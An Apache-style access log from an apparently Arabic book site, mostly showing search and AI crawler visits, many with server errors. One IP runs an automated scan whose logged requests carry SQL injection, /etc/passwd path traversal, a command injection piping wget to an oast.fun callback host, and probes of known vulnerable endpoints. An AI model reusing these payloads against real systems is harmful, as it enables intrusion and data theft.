51.8.102.58 - - [11/Jun/2025:22:36:23 +0200] "GET /category/%D8%B4%D8%B9%D8%B1/121 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.49 - - [11/Jun/2025:22:36:23 +0200] "GET /category/%D8%B4%D8%B9%D8%B1/121 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.210 - - [11/Jun/2025:22:36:24 +0200] "GET /category/%D8%B4%D8%B9%D8%B1/121 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.179 - - [11/Jun/2025:22:36:28 +0200] "GET /category/%D9%82%D8%B5%D8%B5-%D9%82%D8%B5%D9%8A%D8%B1%D8%A9/133 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.58 - - [11/Jun/2025:22:36:28 +0200] "GET /category/%D9%82%D8%B5%D8%B5-%D9%82%D8%B5%D9%8A%D8%B1%D8%A9/133 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.236 - - [11/Jun/2025:22:36:28 +0200] "GET /category/%D9%82%D8%B5%D8%B5-%D9%82%D8%B5%D9%8A%D8%B1%D8%A9/133 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.188 - - [11/Jun/2025:22:36:28 +0200] "GET /category/%D9%82%D8%B5%D8%B5-%D9%82%D8%B5%D9%8A%D8%B1%D8%A9/133 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.132 - - [11/Jun/2025:22:36:32 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D8%A3%D8%B7%D9%81%D8%A7%D9%84/130 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.176 - - [11/Jun/2025:22:36:32 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D8%A3%D8%B7%D9%81%D8%A7%D9%84/130 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.26 - - [11/Jun/2025:22:36:33 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D8%A3%D8%B7%D9%81%D8%A7%D9%84/130 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.188 - - [11/Jun/2025:22:36:33 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D8%A3%D8%B7%D9%81%D8%A7%D9%84/130 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.254 - - [11/Jun/2025:22:36:37 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D9%85%D8%AA%D9%85%D9%8A%D8%B2%D8%A9/129 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.58 - - [11/Jun/2025:22:36:37 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D9%85%D8%AA%D9%85%D9%8A%D8%B2%D8%A9/129 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.236 - - [11/Jun/2025:22:36:37 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D9%85%D8%AA%D9%85%D9%8A%D8%B2%D8%A9/129 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.188 - - [11/Jun/2025:22:36:37 +0200] "GET /category/%D9%83%D8%AA%D8%A8-%D9%85%D8%AA%D9%85%D9%8A%D8%B2%D8%A9/129 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.152 - - [11/Jun/2025:22:36:41 +0200] "GET /category/%D9%86%D8%B5%D9%88%D8%B5/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.58 - - [11/Jun/2025:22:36:42 +0200] "GET /category/%D9%86%D8%B5%D9%88%D8%B5/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.236 - - [11/Jun/2025:22:36:42 +0200] "GET /category/%D9%86%D8%B5%D9%88%D8%B5/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.188 - - [11/Jun/2025:22:36:42 +0200] "GET /category/%D9%86%D8%B5%D9%88%D8%B5/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
66.249.75.236 - - [11/Jun/2025:23:15:38 +0200] "GET /authors/63 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.132.133.198 - - [11/Jun/2025:23:47:41 +0200] "GET /products/%D9%85%D9%86-%D9%87%D9%86%D8%A7-%D8%A5%D9%84%D9%89-%D8%A7%D9%84%D9%82%D9%84%D8%A8/176?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
185.132.133.228 - - [11/Jun/2025:23:47:44 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
23.178.112.210 - - [12/Jun/2025:00:12:33 +0200] "GET /.well-known/acme-challenge/-SxXdXz5X9Gf09hybjByyPOw-JLDKVYz8BtHNTdse20 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
52.167.144.147 - - [12/Jun/2025:00:21:54 +0200] "GET /authors/10 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.75.225 - - [12/Jun/2025:00:39:03 +0200] "GET /products/%D8%B5%D8%AE%D8%A8-%D8%A7%D9%84%D8%AE%D8%B3%D9%8A%D9%81-3/184 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.163 - - [12/Jun/2025:00:51:48 +0200] "GET /?qss-njah-wtjarb-mhlyt-fy-albwkr-balmnswrt-rhlt-alfwz-walthdyat HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.178.112.213 - - [12/Jun/2025:00:56:56 +0200] "GET /.well-known/acme-challenge/8XdGuFM9S-51IhhwsjiQSk87q4dIFU-l1ABITtKm23g HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.107 - - [12/Jun/2025:00:57:00 +0200] "GET /.well-known/acme-challenge/yF5kJ1LCvDes5QWgcPpu5kNdnrptRTPgNJTHSTbLR9U HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.219 - - [12/Jun/2025:00:57:06 +0200] "GET /.well-known/acme-challenge/9Mxzl2cWp9K7qyxoTIoLC_W-2SnXDdbIAME4zqy4o44 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.219 - - [12/Jun/2025:00:57:10 +0200] "GET /.well-known/acme-challenge/caw6RI0dGwTae8Fv5AEvltFkKtUgv74sYBk2xKCMwRM HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
157.55.39.8 - - [12/Jun/2025:04:20:48 +0200] "GET /public/category/%C3%98%C2%B4%C3%98%C2%B9%C3%98%C2%B1/121 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
4.227.36.96 - - [12/Jun/2025:04:47:14 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.85 - - [12/Jun/2025:04:47:15 +0200] "GET /?afdl-tqnyat-allb-fy-albwkr-almsry-dlyl-shaml-lfn-alfwz HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.224 - - [12/Jun/2025:04:50:36 +0200] "GET /?asrar-wastratyjyat-alfwz-wthlylha-fy-alkazynw-balzqazyq HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.111 - - [12/Jun/2025:05:35:52 +0200] "GET /products/%C3%98%C2%A7%C3%99%E2%80%9E%C3%99%E2%80%A0%C3%99%E2%80%A1%C3%99%C5%A0%C3%99%E2%80%A6/125 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.75.236 - - [12/Jun/2025:05:41:24 +0200] "GET /authors HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.163 - - [12/Jun/2025:05:53:39 +0200] "GET /authors/148 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.20 - - [12/Jun/2025:06:06:58 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.20 - - [12/Jun/2025:06:06:58 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.222.253.18 - - [12/Jun/2025:07:10:07 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.226 - - [12/Jun/2025:07:10:07 +0200] "GET /authors/141 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.13 - - [12/Jun/2025:08:14:16 +0200] "GET /product/pages/91 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.171.207.85 - - [12/Jun/2025:09:02:09 +0200] "GET /?innovations-et-machines-a-sous-a-sokode-une-revolution-dans-lunivers-du-jeu HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
31.56.56.152 - - [12/Jun/2025:09:04:15 +0200] "GET /.env HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.56.56.152 - - [12/Jun/2025:09:04:16 +0200] "POST / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
207.46.13.102 - - [12/Jun/2025:10:13:38 +0200] "GET /product/pages/221 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.25 - - [12/Jun/2025:10:53:54 +0200] "GET /public/authors/34 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.244.66.237 - - [12/Jun/2025:10:54:15 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [12/Jun/2025:11:10:13 +0200] "GET /authors/100 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
4.227.36.96 - - [12/Jun/2025:11:20:02 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.85 - - [12/Jun/2025:11:20:02 +0200] "GET /?rhlt-astratyjyt-fy-kazynw-shbr-alkhymt-mghamrt-alfwz-alkbyr HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.20 - - [12/Jun/2025:11:20:53 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.20 - - [12/Jun/2025:11:20:53 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
104.210.140.134 - - [12/Jun/2025:11:41:22 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
66.249.75.236 - - [12/Jun/2025:12:01:08 +0200] "GET /products/%D8%B5%D8%AE%D8%A8-%D8%A7%D9%84%D8%AE%D8%B3%D9%8A%D9%81-3/184 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "POST /guest_auth/guestIsUp.php HTTP/1.1" 403 199 "-" "-"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "POST /bsh.servlet.BshServlet HTTP/1.1" 403 199 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "mac=1&ip=127.0.0.1|wget d14q54aevdlhf743m9cgrwmanehwfk356.oast.fun" 400 173 "-" "-"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 500 542 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:13 +0200] "POST /index.php/User/doLogin HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:14 +0200] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:12:12:14 +0200] "POST /zentao/user-login.html HTTP/1.1" 403 199 "https://php.adabbook.com.eg/zentao/user-login.html" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:14 +0200] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:15 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:16 +0200] "POST /mobile/plugin/browser.jsp HTTP/1.1" 500 542 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:17 +0200] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:12:12:17 +0200] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:12:12:17 +0200] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30"
45.192.99.121 - - [12/Jun/2025:12:12:18 +0200] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/109.0 Safari/537.36"
104.210.140.128 - - [12/Jun/2025:12:20:45 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
20.171.207.85 - - [12/Jun/2025:12:20:57 +0200] "GET /?innovations-et-machines-a-sous-a-sokode-une-revolution-dans-lunivers-du-jeu HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.8.102.209 - - [12/Jun/2025:13:12:44 +0200] "GET /products/%D8%A7%D9%84%D9%82%D9%85%D8%B1-%D8%A7%D9%84%D8%A7%D8%AD%D9%85%D8%B1/219 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.47 - - [12/Jun/2025:13:12:45 +0200] "GET /products/%D8%A7%D9%84%D9%82%D9%85%D8%B1-%D8%A7%D9%84%D8%A7%D8%AD%D9%85%D8%B1/219 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.29 - - [12/Jun/2025:13:12:45 +0200] "GET /products/%D8%A7%D9%84%D9%82%D9%85%D8%B1-%D8%A7%D9%84%D8%A7%D8%AD%D9%85%D8%B1/219 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.73 - - [12/Jun/2025:13:12:46 +0200] "GET /products/%D8%A7%D9%84%D9%82%D9%85%D8%B1-%D8%A7%D9%84%D8%A7%D8%AD%D9%85%D8%B1/219 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
107.174.224.18 - - [12/Jun/2025:14:45:05 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0"
66.249.75.236 - - [12/Jun/2025:15:47:10 +0200] "GET /?les-strategies-efficaces-pour-le-poker-a-lome HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.224 - - [12/Jun/2025:15:48:06 +0200] "GET /products/%D9%85%D8%A7%D9%84%D8%A7%D8%AF%D9%8A%D8%A7/157 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jun/2025:16:13:27 +0200] "GET /products/%D8%A7%D9%84%D8%AB%D9%82%D8%A7%D9%81%D8%A9-%D8%A7%D9%84%D8%AF%D9%88%D8%A7%D8%A6%D9%8A%D8%A9/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.192.99.121 - - [12/Jun/2025:16:13:47 +0200] "GET /users/sign_in HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
45.192.99.121 - - [12/Jun/2025:16:13:47 +0200] "POST /cgi-bin/rpc HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.192.99.121 - - [12/Jun/2025:16:13:47 +0200] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 500 542 "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
66.249.75.236 - - [12/Jun/2025:16:22:54 +0200] "GET /?les-strategies-efficaces-pour-le-poker-a-lome HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.224 - - [12/Jun/2025:17:40:28 +0200] "GET /authors/132 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.192.99.121 - - [12/Jun/2025:19:56:37 +0200] "POST /seeyon/htmlofficeservlet HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:19:56:37 +0200] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
45.192.99.121 - - [12/Jun/2025:19:56:37 +0200] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/108.0 Safari/537.36"
